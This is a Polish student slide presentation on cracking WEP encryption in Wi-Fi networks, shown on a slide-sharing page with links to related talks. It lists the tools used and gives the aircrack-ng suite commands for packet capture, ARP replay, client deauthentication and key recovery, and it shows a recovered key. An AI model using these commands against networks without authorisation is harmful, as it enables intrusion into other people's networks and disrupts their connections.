Łamanie zabezpieczeń WEP w sieci Wi-Fi

Slides:



Advertisements
Podobne prezentacje
I część 1.
Advertisements

Sieci komputerowe.
Sieci bezprzewodowe.
Usługi sieciowe Wykład 5 DHCP- debian
Sieci komputerowe Protokół TCP/IP Piotr Górczyński 27/09/2002.
Użytkowanie Sieci Marcin KORZEB WSTI - Użytkowanie Sieci.
Sieci komputerowe Protokół TCP/IP.
Projekt sieci WLAN w standardzie 802
Krótkie i amatorskie wprowadzenie. Coś musiałem napisać..
ZAPORY SIECIOWE Firewall – ściana fizycznie oddzielająca silnik od pasażerów w samochodzie Sposób zabezpieczenia komputera/sieci przed osobami niepowołanymi.
Sieci komputerowe Wstęp Piotr Górczyński 20/09/2003.
Sieci komputerowe Usługi sieciowe Piotr Górczyński 27/09/2002.
Autor : Artur Waśkowiak
SIECI PRZEMYSŁOWE ETHERNET W AUTOMATYCE
Sieci komputerowe.
Autor Roman Jędras Prowadzący: dr inż. Antoni Izworski Przedmiot:
Prowadzący: dr inż. Antoni Izworski Programowanie warstwy sieciowej
Komputery pod ręką Jak zapewnić dostępność komputerów w szkole, zamiast zamykać je w pracowni Komputerowej ? 1.Na każdej długiej przerwie mógłby być dyżur.
KONKURS WIEDZY O SZTUCE
Usługi sieciowe Wykład 5 DHCP- debian Jarosław Kurek WZIM SGGW 1.
Honorata Prokop, Izabela Ubowska
Piotr Doskocz Aleksandra Lechki Krzysztof Lewicki
Konfiguracja DHCP i dzielenie łącza
Sieci komputerowe: Firewall
PLANET ADW-4302 v2 Modem ADSL 2/2+, Router, Firewall, bezprzewodowy g.
PLANET FPS-3121/FPS-3121G Wieloportowe Print Serwery.
Print serwer 10/100Mbps bezpośrednio podłączany do drukarki FPS-1101.
PLANET WLS-1280 Bezprzewodowy przełącznik sieci LAN
Bramka PLC Ethernet 200Mb PL-501 Page 1 / 8.
Czym jest ISA 2004 Microsoft Internet Security and Acceleration Server 2004 jest zaawansowaną zapora filtrującą ruch w warstwie aplikacji. Razem z zaporą.
Obsługa routera Wykład: Zaawansowane sieci komputerowe
Rozwiązywanie problemów z routerem
Opracował: mgr Mariusz Bruździński
USŁUGA FTP 1. Definicja FTP. FTP (File Transfer Protocol, ang. protokół transmisji plików) jest protokołem typu klient-serwer, który umożliwia przesyłanie.
TOPOLOGIA SIECI LAN.
WI-FI.
Sieci lokalne – metody zwiększania bezpieczeństwa
Instrukcja połączenia z siecią WIFI – Wydziału EITI dla Windows Vista.
Modelowanie bezpieczeństwa infrastruktury IT na bazie doświadczeń z włamań i wykrytych podatności Prowadzący: Specjalista do sp. Informatyki Śledczej Maciej.
BUDOWA I DZIAŁANIE SIECI KOMPUTEROWYCH
Metody zabezpieczania transmisji w sieci Ethernet
Seminarium eduroam – UMK, Tomasz Wolniewicz UCI UMK Tomasz Wolniewicz UCI UMK Projekt eduroam.
Realizacja prostej sieci komputerowej
Dr hab. Dariusz Piwczyński Katedra Genetyki i Podstaw Hodowli Zwierząt
Zdalna identyfikacja systemów operacyjnych i komputerów Nowe techniki oparte na błędach zegarów 3 kwietnia 2005 Opracował: Paweł Pokrywka Promotor: dr.
Sieci komputerowe.
Sieciowe Systemy Operacyjne
Wybrane zagadnienia relacyjnych baz danych
Sieci komputerowe Wstęp Renata Dróbek 3/30/2017.
Sieć komputerowa – grupa komputerów lub innych urządzeń połączonych ze sobą w celu wymiany danych lub współdzielenia różnych zasobów, na przykład: korzystania.
Laboratorium systemów operacyjnych
Podstawy teleinformatyki
Co nowego w Mandrivie 2008? Kamil Porembiński
Sieci komputerowe.
Narzędzia klienta usługi archiwizacji Warsztaty „Usługa powszechnej archiwizacji” Michał Białoskórski, CI TASK Bartłomiej Balcerek, WCSS.
Seminarium eduroam – UMK, Tomasz Wolniewicz UCI UMK Tomasz Wolniewicz UCI UMK Czego wymagać od access-pointów.
 Karta sieciowa to urządzenie odpowiedzialne za wysyłanie i odbieranie danych w sieciach LAN. Każdy komputer, który ma korzystać z dobrodziejstw sieci,
Wybrane systemy operacyjne
System emulacji bezprzewodowych sieci komputerowych
Jednym z podstawowych celów tworzenia sieci komputerowych jest współdzielenie zasobów, takich jak pliki lub drukarki. Każdy z takich zasobów musi być udostępniony,
Autor: Dawid Nowak. Zalecane wymagania sprzętowe. Procesor: 1 GHz 32 bitowy lub 64 bitowy Pamięć RAM: 1 GB dla systemu32 bitowego, 2 GB dla systemu 63.
ZAPORY SIECIOWE - FIREWALL
Co To jest usługa VoIP VoIP - technologia umożliwiająca przesyłanie głosu za pomocą łączy internetowych lub dedykowanych sieci wykorzystujących protokół.
Projekt firmowej sieci Wi-Fi
Systemy operacyjne i sieci komputerowe DZIAŁ : Systemy operacyjne i sieci komputerowe Informatyka Zakres rozszerzony Zebrał i opracował : Maciej Belcarz.
DZIAŁ : Systemy operacyjne i sieci komputerowe
materiały dla uczestników
Anonimowo ść w sieci. Sposoby zachowania anonimowośc i VPNProxyTOR.
Podstawy sieci komputerowych
Bezpieczeństwo sieci WLAN
Zapis prezentacji:

Łamanie zabezpieczeń WEP w sieci Wi-Fi Autorzy: Wojciech Giezek Paweł Guła

Co to jest siec Wi-Fi Klucz WEP Sprzęt i narzędzia Rodzaje ataków Plan prezentacji: Co to jest siec Wi-Fi Klucz WEP Sprzęt i narzędzia Rodzaje ataków

Wi-Fi Zestaw standardów do budowy bezprzewodowej sieci komputerowej. Standard Wi-Fi opiera się na IEEE 802.11.

WEP Protokół działający na zasadzie współdzielonego klucza szyfrującego o długości od 40 do 140 bitów i 24 bitowym wektorze inicjującym.

Sprzęt: średniej klasy notebook z bezprzewodową kartą sieciową Proxim Orinoco Gold (chipset Atheros) średniej klasy komputer PC z bezprzewodową kartą sieciową Edimax access point Netgear notebook: BackTrack Linux (wersja 2.0 beta) PC: Windows 2000 pakiet aircrack-ng uaktualniony do ostatniej wersji (0.7) driver pod Atherosa uaktualniony do ostatniej wersji (0.9.2.1)

Narzędzia: Macchanger – program do zmiany adresu MAC Kismet – wykrywanie i raportowanie informacji o sieci Aircrack-ng To grupa programów umożliwiających monitorowanie, sniffowanie, analizę sieci bezprzewodowych oraz łamanie WEPa. Podstawowymi binarkami są aircrack-ng (łamanie WEP oraz metodą bruteforce WPA), aireplay-ng (wstrzykiwanie pakietów), airodump-ng (pokazywanie informacji o sieci oraz zapisywanie przechwytywanych pakietów).

Macchanger

Kismet

Rodzaje ataków na siec Wi-Fi Klasyczny Chopchop z klientem i bez Fragment

Łamanie klucza WEP Włączamy ariodump-ng lub kismeta Szukamy kanału, SSID i Access pointa na, którym działa siec W nowym terminalu, programem airdump-ng nasłuchujemy na kanale –c11, przechwytujemy IV(--vs), i zapisujemy do pliku (-w zapis wep)

airodump-ng -c KANAL -w PLIK --ivs ath0

Włączono kolejne okienko Do sieci jest podłączony tylko jeden klient (00:0E:2E:8A:2B:DB) IV (#Data=13) musi wzrosnąc żeby włączyc aircrack-ng i zdobyc klucz

aireplay-ng --arpreplay -b MAC_AP -h MAC_CLIENT ath0 Włączenie programu aireplay-ng, jest to program bezobsługowy. Spowoduje przechwycenie większej liczby pakietów i wprowadzenia ich

aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLIENT ath0 Właczenie w kolejnym terminalu Aireplaya do przyspieszenia ARPów co z kolei przyśpieszy pojawianie się IVs

Jeśli nasz atak był skuteczny - po chwili "zaskoczy" nasze drugie okienko czekające na ARPy:

Włączenie pierwszego okienka Liczba IVs rosnie( musi osiągnąc 150.000) Można w tym czasie rozpocząc lamanie klucza programem aircrack-ng a nasze pakiety dalej się zbierają

Zbieranie pakietów

aircrack-ng -n 64 -b MAC_AP PLIK.ivs Rozpoczecie łamania klucza WEP!!!

Łamanie klucza

Znalezienie klucza: 6d:6f:E4:08:41

Dziękujemy za uwagę.